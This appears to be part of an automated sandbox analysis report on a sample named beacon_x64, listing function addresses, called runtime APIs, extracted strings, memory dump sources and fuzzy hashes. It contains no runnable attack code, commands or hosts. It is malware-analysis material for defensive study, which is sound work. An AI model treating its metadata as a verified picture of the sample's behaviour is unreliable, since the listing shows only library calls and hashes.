Part of subcall function 0077E244: RtlFreeHeap.NTDLL ref: 0077E25A
Part of subcall function 0077E244: _errno.LIBCMT ref: 0077E264

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: freemallocstrchr$FreeHeap_errnorand
String ID:
API String ID: 3504763109-0
Opcode ID: f35e4bf4a30ec4413237561f10dac7197b8990473e0b46e11b580f4fb44e5963
Instruction ID: 55a7f7b3f32809edf03b681607377b967745f55769353f44a24040a83f39a19a
Opcode Fuzzy Hash: f35e4bf4a30ec4413237561f10dac7197b8990473e0b46e11b580f4fb44e5963
Instruction Fuzzy Hash: 57711720218E9C8BDF6AAB2C98053F6B3D1FF99349F04856DD58DC7153DE3899478781

Function 001A48CB Relevance: 9.0, Strings: 7, Instructions: 221COMMON

Download Yara Rule

Strings

7)(, xrefs: 001A49F3
kW, xrefs: 001A4A5D
7)(, xrefs: 001A4A0B
!)g, xrefs: 001A4A69
!'r, xrefs: 001A4A55
#(Sx, xrefs: 001A49A7
7?!), xrefs: 001A496B

Memory Dump Source

Source File: 00000000.00000003.2114029429.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_1a0000_beacon_x64.jbxd

Yara matches

Similarity

API ID:
String ID: #(Sx$7?!)$!'r$!)g$7)($7)($kW
API String ID: 0-1342051783
Opcode ID: c2008e09e2477f6178a65bb5ccd84e82589d2734430ab7cc653953120529e47c
Instruction ID: bb8449dab8b0819161a4a7c099f5af1040bb61130bc138c208501f15d38448d9
Opcode Fuzzy Hash: c2008e09e2477f6178a65bb5ccd84e82589d2734430ab7cc653953120529e47c
Instruction Fuzzy Hash: FC51207E484756DFD711AE3489834C7BBA9EA8332AB580739C8610F243E7915923CBC3

Function 00763170 Relevance: 8.9, APIs: 7, Instructions: 181COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 007631BD

Part of subcall function 0077E284: _FF_MSGBANNER.LIBCMT ref: 0077E2B4
Part of subcall function 0077E284: _NMSG_WRITE.LIBCMT ref: 0077E2BE
Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E2F2
Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E2FD
Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E308

malloc.LIBCMT ref: 007631C8

Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E318
Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E31D

free.LIBCMT ref: 007632AF
free.LIBCMT ref: 007632B7
free.LIBCMT ref: 007632BF
free.LIBCMT ref: 007632CB
free.LIBCMT ref: 007632D8

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: a46d6df1e63736bbf5e6f8efd513222b2720334364c4a35ae3722e37f335d37b
Instruction ID: 9cc776225398e6a65e09f33f8b26a5f77b0bbfd022bf8d26cb7f0aee5b1db5c2
Opcode Fuzzy Hash: a46d6df1e63736bbf5e6f8efd513222b2720334364c4a35ae3722e37f335d37b
Instruction Fuzzy Hash: E841CD30718F4A9F9B59AB2C986567A77D4FB89310750426DE88BC3207EF24ED02CB85

Function 004025E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 0040268A

Strings

CCG , xrefs: 004025F6

Memory Dump Source

Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: 648addc203ed1b4cbdb7cdbf4c8cfef0a20b4c864bfebc609ca8e68908cbbe4c
Instruction ID: 293b1a304c256a7ee66eff26b1d91746a270e19344e3818b9830088d28418f87
Opcode Fuzzy Hash: 648addc203ed1b4cbdb7cdbf4c8cfef0a20b4c864bfebc609ca8e68908cbbe4c
Instruction Fuzzy Hash: 1421A171B0154146EE396279865D33B10019B9A374F284E379A3DA73E0DAFECCC2830E

Function 0076BA74 Relevance: 7.9, APIs: 6, Instructions: 411COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00774FEC: malloc.LIBCMT ref: 00775008

malloc.LIBCMT ref: 0076BB3B

Part of subcall function 0077E284: _FF_MSGBANNER.LIBCMT ref: 0077E2B4
Part of subcall function 0077E284: _NMSG_WRITE.LIBCMT ref: 0077E2BE
Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E2F2
Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E2FD
Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E308

Part of subcall function 0077B230: malloc.LIBCMT ref: 0077B29C

Part of subcall function 0077DAA8: malloc.LIBCMT ref: 0077DAF8

Part of subcall function 0077DAA8: realloc.LIBCMT ref: 0077DB07

malloc.LIBCMT ref: 0076BC4A
_snprintf.LIBCMT ref: 0076BCC1
_snprintf.LIBCMT ref: 0076BCE7
_snprintf.LIBCMT ref: 0076BD0E
free.LIBCMT ref: 0076BEC6

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: malloc$_snprintf$_errno$_callnewhfreerealloc
String ID:
API String ID: 74200508-0
Opcode ID: fd4b1ce187cf5d2c7b3c7d1d5f2f485ec143d87fcb2d796d9dd721ce5a89571b
Instruction ID: e26696343c255ecab97ccd45d56bdc8ef96fb18ce55bd0f77c400ddd59c49d6a
Opcode Fuzzy Hash: fd4b1ce187cf5d2c7b3c7d1d5f2f485ec143d87fcb2d796d9dd721ce5a89571b
Instruction Fuzzy Hash: A7C1A630714A448BDF18BB78885A66D72D2FBC5341F50852DA94BC7293DF3CDD458792

Function 00770694 Relevance: 7.7, APIs: 5, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00774FEC: malloc.LIBCMT ref: 00775008

Part of subcall function 0077F620: _errno.LIBCMT ref: 0077F577
Part of subcall function 0077F620: _invalid_parameter_noinfo.LIBCMT ref: 0077F582

fseek.LIBCMT ref: 00770730

Part of subcall function 0077FEA4: _errno.LIBCMT ref: 0077FECC
Part of subcall function 0077FEA4: _invalid_parameter_noinfo.LIBCMT ref: 0077FED7

_ftelli64.LIBCMT ref: 00770738

Part of subcall function 0077FF18: _errno.LIBCMT ref: 0077FF36
Part of subcall function 0077FF18: _invalid_parameter_noinfo.LIBCMT ref: 0077FF41

fseek.LIBCMT ref: 00770748

Part of subcall function 0077FEA4: _fseek_nolock.LIBCMT ref: 0077FEF5

malloc.LIBCMT ref: 00770788

Part of subcall function 0077E284: _FF_MSGBANNER.LIBCMT ref: 0077E2B4
Part of subcall function 0077E284: _NMSG_WRITE.LIBCMT ref: 0077E2BE
Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E2F2
Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E2FD
Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E308

fclose.LIBCMT ref: 00770845

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfo$fseekmalloc$_callnewh_fseek_nolock_ftelli64fclose
String ID:
API String ID: 2887643383-0
Opcode ID: f1c4e02295faa99f8843714657dd5281141177bf23df19fa39898597ddf49910
Instruction ID: 5e181d30c142f8fa952d89fa4e16031bd4b5536235cd173fb5092053f5e92a9e
Opcode Fuzzy Hash: f1c4e02295faa99f8843714657dd5281141177bf23df19fa39898597ddf49910
Instruction Fuzzy Hash: 9F51A831718A48CFDB4DEB2CD45A67972D1FB98350B50826EE48FC3296DE689D0687C2

Function 00789348 Relevance: 7.7, APIs: 5, Instructions: 201COMMON

Download Yara Rule

APIs

_mtinitlocknum.LIBCMT ref: 00789375

Part of subcall function 00782E58: _FF_MSGBANNER.LIBCMT ref: 00782E75
Part of subcall function 00782E58: _NMSG_WRITE.LIBCMT ref: 00782E7F

_lock.LIBCMT ref: 00789388
_lock.LIBCMT ref: 007893E3
_calloc_crt.LIBCMT ref: 0078949A

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: _lock$_calloc_crt_mtinitlocknum
String ID:
API String ID: 3962633935-0
Opcode ID: b1e94c722dda090378a8e761eed7513b06593d91ccd6790d0d4411b736f80c7c
Instruction ID: 293a3b589aa27a4315a13af73b9f43b4cada5b07f89be46eab6da782cba23a7f
Opcode Fuzzy Hash: b1e94c722dda090378a8e761eed7513b06593d91ccd6790d0d4411b736f80c7c
Instruction Fuzzy Hash: 88511670558B488FDB18AF58C885276B7D0FB58310F19065DE98EC72A2DB78DC43CB82

Function 007644F0 Relevance: 7.7, APIs: 6, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 0076453A

Part of subcall function 0077E284: _FF_MSGBANNER.LIBCMT ref: 0077E2B4
Part of subcall function 0077E284: _NMSG_WRITE.LIBCMT ref: 0077E2BE
Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E2F2
Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E2FD
Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E308

malloc.LIBCMT ref: 00764545

Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E318
Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E31D

free.LIBCMT ref: 0076462C
free.LIBCMT ref: 00764634
free.LIBCMT ref: 00764640
free.LIBCMT ref: 0076464D

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: 9dd44889f23309e2c133c4e883ac3d7c03cf28f4ebc62bcd805b5d39935d1e2d
Instruction ID: 0e59e4cb0128d0bb08517e6745bf244310a2791b5ed09b6ae71e18c3bab3e644
Opcode Fuzzy Hash: 9dd44889f23309e2c133c4e883ac3d7c03cf28f4ebc62bcd805b5d39935d1e2d
Instruction Fuzzy Hash: FD41F431318F0D4B9B2DAA2C884557A76D9EB9B355B14416DD88BC3213ED28DC0787C2

Function 0078139C Relevance: 7.6, APIs: 5, Instructions: 149COMMONLIBRARYCODE

Download Yara Rule

APIs

_fileno.LIBCMT ref: 007813B9

Part of subcall function 00784A54: _errno.LIBCMT ref: 00784A5D
Part of subcall function 00784A54: _invalid_parameter_noinfo.LIBCMT ref: 00784A68

_errno.LIBCMT ref: 007813C9

Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C

_errno.LIBCMT ref: 007813E5
_isatty.LIBCMT ref: 00781446
_getbuf.LIBCMT ref: 00781452

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: _errno$_fileno_getbuf_getptd_noexit_invalid_parameter_noinfo_isatty
String ID:
API String ID: 304646821-0
Opcode ID: c35e8c2de9f02937b40d8dcb44627bb11330896f7d068decc206105344bae12a
Instruction ID: 821138d1e5f914a6db4f1819ecc2cb32554c935b0c823d4c023772fd0f7d0855
Opcode Fuzzy Hash: c35e8c2de9f02937b40d8dcb44627bb11330896f7d068decc206105344bae12a
Instruction Fuzzy Hash: 0341E230294B488FCB58FF6CC48676577E5FF48320BA44699D85ACB296DB78DC82C781

Function 00778220 Relevance: 7.6, APIs: 6, Instructions: 142COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0077824F

Part of subcall function 0077E284: _FF_MSGBANNER.LIBCMT ref: 0077E2B4
Part of subcall function 0077E284: _NMSG_WRITE.LIBCMT ref: 0077E2BE
Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E2F2
Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E2FD
Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E308

_snprintf.LIBCMT ref: 00778267

Part of subcall function 0077E63C: _errno.LIBCMT ref: 0077E673
Part of subcall function 0077E63C: _invalid_parameter_noinfo.LIBCMT ref: 0077E67E

free.LIBCMT ref: 0077827E

Part of subcall function 0077E244: RtlFreeHeap.NTDLL ref: 0077E25A
Part of subcall function 0077E244: _errno.LIBCMT ref: 0077E264

malloc.LIBCMT ref: 007782CE
_snprintf.LIBCMT ref: 007782E6
free.LIBCMT ref: 0077830E

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: _errno$_snprintffreemalloc$FreeHeap_callnewh_invalid_parameter_noinfo
String ID:
API String ID: 343393124-0
Opcode ID: faf2166294d0965833cb84c6e7fe882f3c5ed13ceeefabe40a4c11aee224dca5
Instruction ID: 5bd3436c9a0313dc8569014346f5b8b1deb053a5d6c5bcc6e5dd66d26f3edcea
Opcode Fuzzy Hash: faf2166294d0965833cb84c6e7fe882f3c5ed13ceeefabe40a4c11aee224dca5
Instruction Fuzzy Hash: E031B33070CE4C4FDB98AB2CA82977877D2F79D710754869DE08EC3257DE289C428786

Function 0076EC64 Relevance: 7.6, APIs: 5, Instructions: 90fileCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0076EC85

Part of subcall function 0077E284: _FF_MSGBANNER.LIBCMT ref: 0077E2B4
Part of subcall function 0077E284: _NMSG_WRITE.LIBCMT ref: 0077E2BE
Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E2F2
Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E2FD
Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E308

free.LIBCMT ref: 0076ECC0
fwrite.LIBCMT ref: 0076ED01
fclose.LIBCMT ref: 0076ED09
free.LIBCMT ref: 0076ED16

Part of subcall function 0077E244: RtlFreeHeap.NTDLL ref: 0077E25A
Part of subcall function 0077E244: _errno.LIBCMT ref: 0077E264

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: _errno$free$FreeHeap_callnewhfclosefwritemalloc
String ID:
API String ID: 415550720-0
Opcode ID: c287650ca013cd6fba82a94b2bfab312077d62521af6d54d1c0599a360ecab3d
Instruction ID: 7f6e41daabbb6c495644a3afa69bc307d0ad2a1136c7c9240cc8286b911a8d9c
Opcode Fuzzy Hash: c287650ca013cd6fba82a94b2bfab312077d62521af6d54d1c0599a360ecab3d
Instruction Fuzzy Hash: 10215E20728E088FDB85FB6C845926EB2D2FB98384F54456DA44EC3286EE68DD018782

Function 007895EC Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 007895FD

Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C

__doserrno.LIBCMT ref: 007895F5

Part of subcall function 00780CA8: _getptd_noexit.LIBCMT ref: 00780CAC

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno_errno
String ID:
API String ID: 2964073243-0
Opcode ID: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
Instruction ID: d81ed5117c0eca044b34a26e65ebba909fd7064c4c26679c6bc089a52d94aeb6
Opcode Fuzzy Hash: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
Instruction Fuzzy Hash: C1F0F6303A49488EE799BB74C85537832A0FF11335FA84354E105C71E6EB7C54458762

Function 0076DC04 Relevance: 6.5, APIs: 5, Instructions: 254COMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 0076DCD3
_snprintf.LIBCMT ref: 0076DCFE
_snprintf.LIBCMT ref: 0076DD1A
_snprintf.LIBCMT ref: 0076DDCF
_snprintf.LIBCMT ref: 0076DDE6

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: _snprintf
String ID:
API String ID: 3512837008-0
Opcode ID: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
Instruction ID: c111cbc10fb1c1b4aeaef88a0b9d831f730f57d2761ceac17baf2d471b1f9886
Opcode Fuzzy Hash: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
Instruction Fuzzy Hash: FF819431628A488FDB55FF28DC85BAA73E5FB99304F10456AE84BC3151DF38D945CB82

Function 0077DFEC Relevance: 6.3, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0077E00F

Part of subcall function 0077E284: _FF_MSGBANNER.LIBCMT ref: 0077E2B4
Part of subcall function 0077E284: _NMSG_WRITE.LIBCMT ref: 0077E2BE
Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E2F2
Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E2FD
Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E308

malloc.LIBCMT ref: 0077E01D

Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E318
Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E31D

malloc.LIBCMT ref: 0077E03F
_snprintf.LIBCMT ref: 0077E05A

Part of subcall function 0077E63C: _errno.LIBCMT ref: 0077E673
Part of subcall function 0077E63C: _invalid_parameter_noinfo.LIBCMT ref: 0077E67E

malloc.LIBCMT ref: 0077E075

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
String ID:
API String ID: 2026495703-0
Opcode ID: b352101c7262c8bcb4a5e96376bd10b91777e0dce9561e268234f3b9efdf5141
Instruction ID: 4bb1e1339e998c6aa3d7dac8f45b7ec76bca966c5d0deecd3cf406aca55126e2
Opcode Fuzzy Hash: b352101c7262c8bcb4a5e96376bd10b91777e0dce9561e268234f3b9efdf5141
Instruction Fuzzy Hash: E911467061CF044FDBA8EB6CA44521576D1F79C350F1045AEF09EC3396EA389D4147C1

Function 0077F62C Relevance: 6.2, APIs: 4, Instructions: 194COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0077F664

Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C

_invalid_parameter_noinfo.LIBCMT ref: 0077F66F
_flush.LIBCMT ref: 0077F721
_fileno.LIBCMT ref: 0077F742

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: _errno_fileno_flush_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 634798775-0
Opcode ID: 34e7f92ebff520e6a17a4e985317f9f17b8bd586bad3667c73d28a98cf0395a5
Instruction ID: 6428cc6b0d270ce9e16723fe7d8739c6394ee74e622c709db41eb6123e251746
Opcode Fuzzy Hash: 34e7f92ebff520e6a17a4e985317f9f17b8bd586bad3667c73d28a98cf0395a5
Instruction Fuzzy Hash: 26412A30318F0D8FDF6C6E6D564A23572C0EB69750B64827ED49EC3172EAA9DC5282C6

Function 007600D0 Relevance: 6.1, APIs: 4, Instructions: 90COMMONLIBRARYCODE

Download Yara Rule

APIs

clock.LIBCMT ref: 00760117
clock.LIBCMT ref: 00760124
clock.LIBCMT ref: 0076012D
clock.LIBCMT ref: 0076013A

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: clock
String ID:
API String ID: 3195780754-0
Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
Instruction ID: a3bd9b35f68840097c4e433f8cdf26b5075fff118026e843731e07a4d12d2bc7
Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
Instruction Fuzzy Hash: CE11727140C70D8F473CBDA8988653BB7D0EB96350F15466EED8BC3212F9A49C4287D6

Function 00401FD0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMON

Download Yara Rule

Strings

Unknown pseudo relocation protocol version %d., xrefs: 004022A8
Unknown pseudo relocation bit size %d., xrefs: 00402294

Memory Dump Source

Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
API String ID: 0-395989641
Opcode ID: 46b8cc2d54abce7c7c7d07232f07b04759b4e10a12a30095010051897671b5f5
Instruction ID: 8c8005ec778b1d8b89afdaa8f366cc80ce98c81ac44c8c214e0d273334ccb7fd
Opcode Fuzzy Hash: 46b8cc2d54abce7c7c7d07232f07b04759b4e10a12a30095010051897671b5f5
Instruction Fuzzy Hash: 1A711276B10B9487DB20CF61DA4875A7761FB59BA8F54822AEF08277E8DB7CC540C608

Function 00760CC4 Relevance: 5.4, APIs: 4, Instructions: 410COMMONLIBRARYCODE

Download Yara Rule

APIs

calloc.LIBCMT ref: 00760D6A

Part of subcall function 0078DE08: _calloc_impl.LIBCMT ref: 0078DE18
Part of subcall function 0078DE08: _errno.LIBCMT ref: 0078DE2B
Part of subcall function 0078DE08: _errno.LIBCMT ref: 0078DE35

free.LIBCMT ref: 00760EF3
free.LIBCMT ref: 00760EFD

Part of subcall function 0077E244: RtlFreeHeap.NTDLL ref: 0077E25A
Part of subcall function 0077E244: _errno.LIBCMT ref: 0077E264

free.LIBCMT ref: 00760F0F

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: _errnofree$FreeHeap_calloc_implcalloc
String ID:
API String ID: 2553729582-0
Opcode ID: d93992b633c35f2e37b516dd72fb4d9a33d59668b61f8d19e3ffcf9038676577
Instruction ID: 88611cfce028fd107b0e915a4b716b783549fae80e164730d5aecc6aeadf9fae
Opcode Fuzzy Hash: d93992b633c35f2e37b516dd72fb4d9a33d59668b61f8d19e3ffcf9038676577
Instruction Fuzzy Hash: C5D13D70618B488FDB58DF5CD4897AABBE1FB98305F10462EE88EC3251DB74D945CB82

Function 00401DC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00401E69

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
Address %p has no image-section, xrefs: 00401DC0, 00401FA5

Memory Dump Source

Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 1804819252-157664173
Opcode ID: 4222c966f1866e0347074a23eb8cec22519ab6179e0d58ab4d36e181926c5116
Instruction ID: 3b33824f85b17f90b3a42b000daced5dafaf341a27cace3064c240a44d9835c1
Opcode Fuzzy Hash: 4222c966f1866e0347074a23eb8cec22519ab6179e0d58ab4d36e181926c5116
Instruction Fuzzy Hash: C43106B3701A41A6EB128F12ED417593761B755BEAF48413AEF0C173A1EB3CD986C788

Function 0077E860 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0077E8B1

Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C

_invalid_parameter_noinfo.LIBCMT ref: 0077E8BC

Strings

B, xrefs: 0077E8E8

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID: B
API String ID: 1812809483-1255198513
Opcode ID: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
Instruction ID: 864e47c8bfa6ab0344e47039fc29137514ffc30858f4f77ab2d5d2fc3d6a7225
Opcode Fuzzy Hash: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
Instruction Fuzzy Hash: F3118F30628B088FDB44EF589485765B7D1FBA8324F6047AEA41DC72A1DB78C984C782

Function 00401010 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 0040107F

Strings

P0E, xrefs: 0040103D
06E, xrefs: 00401089

Memory Dump Source

Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd

Similarity

API ID: __set_app_type
String ID: 06E$P0E
API String ID: 1108511539-3978550416
